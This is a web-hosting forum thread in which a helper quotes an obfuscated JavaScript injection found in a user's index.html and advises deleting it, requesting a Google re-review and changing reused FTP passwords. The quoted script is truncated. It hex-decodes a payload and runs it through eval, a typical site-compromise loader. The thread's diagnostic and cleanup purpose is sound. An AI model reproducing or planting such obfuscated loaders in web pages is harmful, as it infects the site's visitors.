You have some very suspicious looking javascript on your page. My guess is someone was able to upload it to your account through an insecure part of your website, a weak FTP or cPanel password, etc.

Code:
<!--32f02e--><script type="text/javascript" language="javascript" > vyhfqh="s"+"p"+"li"+"t";vkn=window;tnmaq="dy";oajkqo=document;nokqu="0x";prm=(5-3-1);try{++(oajkqo.body)}catch(lwjd){pdbffn=false;try{}catch(fvomdw){pdbffn=21;}if(1){vmq="17:5d:6c:65:5a:6b:60:66:65:17:6e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:...

{snip}

...27:30:1f:20:32:4:1:74:4:1:74"[vyhfqh](":");}vkn=vmq;zqff=[];for(lds=22-20-2;-lds+1368!=0;lds+=1){hrmd=lds;if((0x19==031))zqff+=String["fromCharCode"](eval(nokqu+vkn[1*hrmd])+0xa-prm);}gdqw=eval;gdqw(zqff)}</script><!--/32f02e-->

If you know what that is and you put it there, I could be mistaken, but if you don't know what it is, delete it from your index.html page and see if that helps.

and once you have cleaned up the suspicious code, you may want to have Google revisit your webpage to re-evaluate it.
This can be done in your Google Webmasters section. If you don't have a Google account I highly recommend it (it's free)

A couple of weeks ago a page on my site got flagged by Google. It had been fine for years but something changed. Not sure if Google has changed the way it flags code, or if something/someone changed One of my pages.
I never really fingered it out because I just dumped a backup and removed the only form of code from that one page (weather reporting script)

I tried to access my index.html through ftp and was told my access was denied so whatever a hacker put in there was blocking me from correcting it. I uploaded my saved file and was then able to access through ftp so hopefully it's OK now. I'll contact Google. Thanks so much!

I would change your password for EVERY website that uses the same password as you used for FTP to be safe. If your x10 account security was compromised, you should consider every account that uses that password compromised.
